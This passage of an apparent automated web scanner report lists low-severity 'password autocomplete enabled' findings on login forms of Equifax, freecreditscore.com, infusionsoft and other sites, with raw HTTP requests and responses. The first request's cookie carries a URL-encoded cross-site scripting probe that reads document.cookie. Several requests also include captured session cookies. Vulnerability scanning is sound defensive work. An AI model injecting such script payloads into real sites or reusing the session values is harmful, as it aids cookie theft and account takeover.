Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.1.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:05:40 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 7298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
</h1> <form name="Login" action="/login/" method="post"> <p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/> <a href="/login/recover/" class="second">
...[SNIP]...

19.25. https://www.econsumer.equifax.com/otc/personalInfo.ehtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /otc/personalInfo.ehtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /otc/personalInfo.ehtml HTTP/1.1
Host: www.econsumer.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=857e5247922609777fdaaf17d37b; style=null; hbx.hc3=null; JROUTE=ush2; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; CP=null*; hbx.timestamp=1303614816593; hbx.hc2=CJ; foresee.alive=1303614816186;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:46 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=886e62818fa6c33fbbcc7ef59ff42; Path=/otc; Secure
Set-cookie: JROUTE=iFbh; Path=/otc; Secure
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Personal
...[SNIP]...
</p>
<form name="loginForm" method="POST" action="login.ehtml" onsubmit="return reset_login_form();isLoginInProcess();">
<table border="0" cellpadding="5" cellspacing="0">
...[SNIP]...
<td><input type="password" name="pin" maxlength="20" size="20" value=""></td>
...[SNIP]...

19.26. https://www.freecreditscore.com/dni/sign-in.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/sign-in.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /dni/sign-in.aspx HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage11&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; NavigationPath=default; LastVisitDate=4/24/2011 5:34:46 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+sign-in; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 6:25:26 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:25:26 GMT
ETag: "pvdcb29fc310c6ce2e8ac88af3a0c302e2"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U24A69375].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           My Credit Score - Member Login | Free Credit Score
       </title>
   
...[SNIP]...
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
       <form name="MasterPage" method="post" action="sign-in.aspx" id="MasterPage">
<input type="hidden" name="__CURRENTREFRESHTICKET" value="1" />
...[SNIP]...
<span id="loginUser_ecdPassword"><input name="loginUser:ecdPassword:password" type="password" maxlength="35" size="40" id="loginUser_ecdPassword_password" /></span>
...[SNIP]...

19.27. http://www.gcpowertools.com/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gcpowertools.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx HTTP/1.1
Host: www.gcpowertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=quxbuzE5zAEkAAAANTBhMjNjZjctYWYxZC00ZWYzLWI4YmEtMGE4YWU2ODkyNmJh11sWO77u6CaMOxTpEVNroWhCSTY1; ASP.NET_SessionId=3oa45t334h4qnx45al4bl245; __utmz=111490962.1303663938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111490962.1783537933.1303663938.1303663938.1303663938.1; __utmc=111490962; __utmb=111490962.1.10.1303663938

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=10
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 16:56:30 GMT
Last-Modified: Sun, 24 Apr 2011 16:56:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 1.7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:56:20 GMT
Content-Length: 61775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<span class="txtWrapper">
<input name="ctl00$ContentPlaceHolderMain$txtPassword" type="password" maxlength="50" id="ctl00_ContentPlaceHolderMain_txtPassword" class="txt" value="" onkeypress="javascript:return KeywordSubmitOnEnter(event)" />
<span id="ctl00_ContentPlaceHolderMain_RequiredFieldValidator1" title="Please enter your password." class="PasswordRecoveryNotification" style="color:Red;visibility:hidden;">
...[SNIP]...

19.28. http://www.gcpowertools.com/Register.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gcpowertools.com
Path:   /Register.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /Register.aspx HTTP/1.1
Host: www.gcpowertools.com
Proxy-Connection: keep-alive
Referer: http://www.gcpowertools.com/products/SpreadforASPNET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=quxbuzE5zAEkAAAANTBhMjNjZjctYWYxZC00ZWYzLWI4YmEtMGE4YWU2ODkyNmJh11sWO77u6CaMOxTpEVNroWhCSTY1; ASP.NET_SessionId=3oa45t334h4qnx45al4bl245; __utmz=111490962.1303663938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111490962.1783537933.1303663938.1303663938.1303663938.1; __utmc=111490962; __utmb=111490962.1.10.1303663938

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 1.7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:56:22 GMT
Content-Length: 84947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/Register.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="FormSectionValue">
<input name="ctl00$ContentPlaceHolderMain$ctlRegister$CreateUserWizard1$CreateUserStepContainer$Password" type="password" id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_Password" onkeypress="return KeyPress(event);" style="width:200px;" />
<span id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_PasswordRequired" style="color:Red;visibility:hidden;">
...[SNIP]...
<td class="FormSectionValue">
<input name="ctl00$ContentPlaceHolderMain$ctlRegister$CreateUserWizard1$CreateUserStepContainer$ConfirmPassword" type="password" id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_ConfirmPassword" onkeypress="return KeyPress(event);" style="width:200px;" />
<span id="ctl00_ContentPlaceHolderMain_ctlRegister_CreateUserWizard1_CreateUserStepContainer_ConfirmPasswordRequired" style="color:Red;display:none;">
...[SNIP]...

19.29. http://www.hotelclub.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232704
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: anon=2434808611872011042422094; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=IDCOCPBACOINJJKHPNLDLKKO; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div id="MemberLoginTemplate" class="logout_padding">
<form method="post" name="frmLogin" onSubmit="return CheckVal(this)" action="https://www.hotelclub.com/membercheckref.asp"><img height="47" width="280" alt="" src="siteengine/htc/img/dreamclub-trans-EN.png">
...[SNIP]...
</label><input id="password" name="password" type="password" class="forminput" value=""><div class="clear">
...[SNIP]...

19.30. http://www.infusionblog.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<div id="loginPanelContent"><form id="loginForm" method="post" action=""><div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

19.31. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password"/></dd>
...[SNIP]...

19.32. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

19.33. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

19.34. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
